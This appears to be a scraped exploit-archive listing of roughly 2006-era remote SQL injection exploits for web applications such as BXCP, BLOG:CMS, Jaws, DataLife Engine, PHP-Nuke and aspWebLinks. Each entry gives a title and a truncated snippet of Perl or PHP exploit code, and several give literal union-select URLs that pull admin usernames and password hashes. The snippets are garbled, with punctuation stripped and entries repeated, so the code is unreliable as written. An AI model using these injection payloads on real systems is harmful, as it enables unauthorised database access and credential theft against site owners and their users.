BXCP <= 0.3.0.4 (where) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ==================================================== BXCP newProto="tcp", PeerAddr="$webpage", PeerPort="80" || die "+ Can't connect to Server\n"; print " exploiting\n"; print $sock "GET $get HTTP/1.1\n"; print $sock "Host: $webpage\n";...

BXCP &lt;= 0.3.0.4 (where) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl use IO::Socket; print q ------------------------------------------------------------------------------------- BXCP exploit by x23 curse-crew.de geekbar.cx.la geeknet.uttx.net use: bxcp.pl server dir id sample: $ perl bxcp.pl bxcp.com / 1 connectin...

DZCP (deV!L_z Clanportal) 1.34 - id SQL Injection

DZCP deV!Lz Clanportal 1.34 - id SQL Injection ? errorreportingEERROR; function exploitinit if !extensionloaded'phpcurl' && !extensionloaded'curl' if !dl'curl.so' && !dl'phpcurl.dll' die "oo error - cannot load curl extension!"; function exploitheader echo...

XOOPS myAds Module (lid) Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications =========================================================== XOOPS myAds Module lid Remote SQL Injection Vulnerability =========================================================== Xoops myAds module SQL-Injection Discovered: KeyCoder Visit :...

BLOG:CMS &lt;= 4.0.0k Remote SQL Injection Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "BLOG:CMS = 4.0.0k sql injection/admin credentials disclosure exploit\n"; echo "by rgod [email protected]\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork: "Powered by BLOG:CMS"|"Powered by...

BLOG:CMS <= 4.0.0k Remote SQL Injection Exploit

Exploit for unknown platform in category web applications =============================================== BLOG:CMS url=stripslashes$row-url; $redirect=true; if strpos$row-url,'|noseo|'!==false $arr=explode",",'msnbot,googlebot,crawler,centrum'; foreach $arr as $s if strstr$SERVER"HTTPUSERAGENT",$...

Scout Portal Toolkit &lt;= 1.4.0 (forumid) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl =============================================================== Scout Portal Toolkit 1.4.0 Remote SQL injection Exploit Coded By Simo64 Moroccan Security Research Team Specials thx to :Greetz : CiM-Team - CrAsHoVeRrIdE - dabdoub - damip - Darkbite...

Scout Portal Toolkit <= 1.4.0 (forumid) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ==================================================================== Scout Portal Toolkit = 1.4.0 forumid Remote SQL Injection Exploit ==================================================================== !/usr/bin/perl...

Jaws &lt;= 0.6.2 (Search gadget) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "Jaws = 0.6.2 'Search gadget' SQL injection / admin credentials disclosure\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "dork: "powered by jaws" | "powered by the...

DataLife Engine &lt;= 4.1 Remote SQL Injection Exploit (perl)

No description provided by source. !/usr/bin/perl DataLife Engine sql injection exploit by RST/GHC coded by 1dt.w0lf RST/GHC http://rst.void.ru http://ghc.ru 18.06.06 use LWP::UserAgent; use Getopt::Std; getopts'u:n:p:'; $url = $optu; $name = $optn; $prefix = $optp || 'dle'; if!$url || !$name $sn...

DataLife Engine &lt;= 4.1 Remote SQL Injection Exploit (php)

No description provided by source. ?php errorreporting EERROR; iniset"maxexecutiontime",0; echo ' +========================================+ | RST/GHC Datalife SQL injection exploit | +========================================+ Lite Version for DLE =4.1 '; if $argc 2 print " Usage: " . $argv0 . "...

DataLife Engine <= 4.1 Remote SQL Injection Exploit (php)

Exploit for unknown platform in category web applications ========================================================= DataLife Engine Lite Version for DLE '; if $argc table prefix\n"; print " ex.: " . $argv0 . " datalife.engine.net admin\n"; credits; exit; //DEFINE USER ID $urla = 'http://' . $argv...

WeBBoA Host Script 1.1 Remote SQL Injection Vulnerability

No description provided by source. There is Sql injection WeBBoA Host Script v1.1 Risk=High Exploit: http://SITE/?islem=hostsatinal&id=-1%20%20union%20select%200,1,2,kuladi,4,5,6,7,sifre%20from%20members+where+uyeid=1 Credit: EntriKa milw0rm.com 2006-06-19...

PHP-Nuke Download Module Remote SQL Injection

================================== Fund By:BuNy-m Special for Site:www.alshmokh.com E-mail:[email protected] ================================== Example: /modules.php?name=Downloads&dop=viewdownload&cid=220UNION20select20counter,20aid,20pwd20FROM20nukeauthors20...

ewsEngine &lt;= 1.5.0&#40;newscomments.php&#41; Remote SQL Injection Vulnerability

Title : NewsEngine = 1.5.0newscomments.php Remote SQL Injection Vulnerability Author : ajann Vulnerability; $$$ http://target/path/newscomments.php Example: $$...

Particle Wiki &lt;= 1.0.2 (version) Remote SQL Injection Vulnerability

No description provided by source. Particle wiki = 1.0.2 Remote SQLInjection - Username/Passwordhash Extractor Thanks to UNSECURED SYSTEMS : http://pridels.blogspot.com/2006/06/particle-wiki-sql-inj.html Exploited by FarhadKey from http://www.kapda.ir Username :...

aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change Exploit

!-- Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection Author : ajann Dork : aspWebLinks 2.0 SQL INJECTION: http://target/path/links.asp?action=reporterror&linkID=22120union20select+0,administrativepassword,0,0,0,0,0,0,0+from+config -- titleAspWebLink 2.0 Remote...

ProPublish 2.0 - catid SQL Injection

ProPublish 2.0 - catid SQL Injection ProPublish 2.0 catid Remote SQL Injection Vulnerability Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded Exploited by FarhadKey from kapda.ir Exploit :...

ProPublish 2.0 (catid) Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications ========================================================= ProPublish 2.0 catid Remote SQL Injection Vulnerability ========================================================= ProPublish 2.0 catid Remote SQL Injection Vulnerability Thanks to...

aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change Exploit

Exploit for unknown platform in category web applications ================================================================ aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change Exploit ================================================================ AspWebLink 2.0 Remote Admin Pass Change...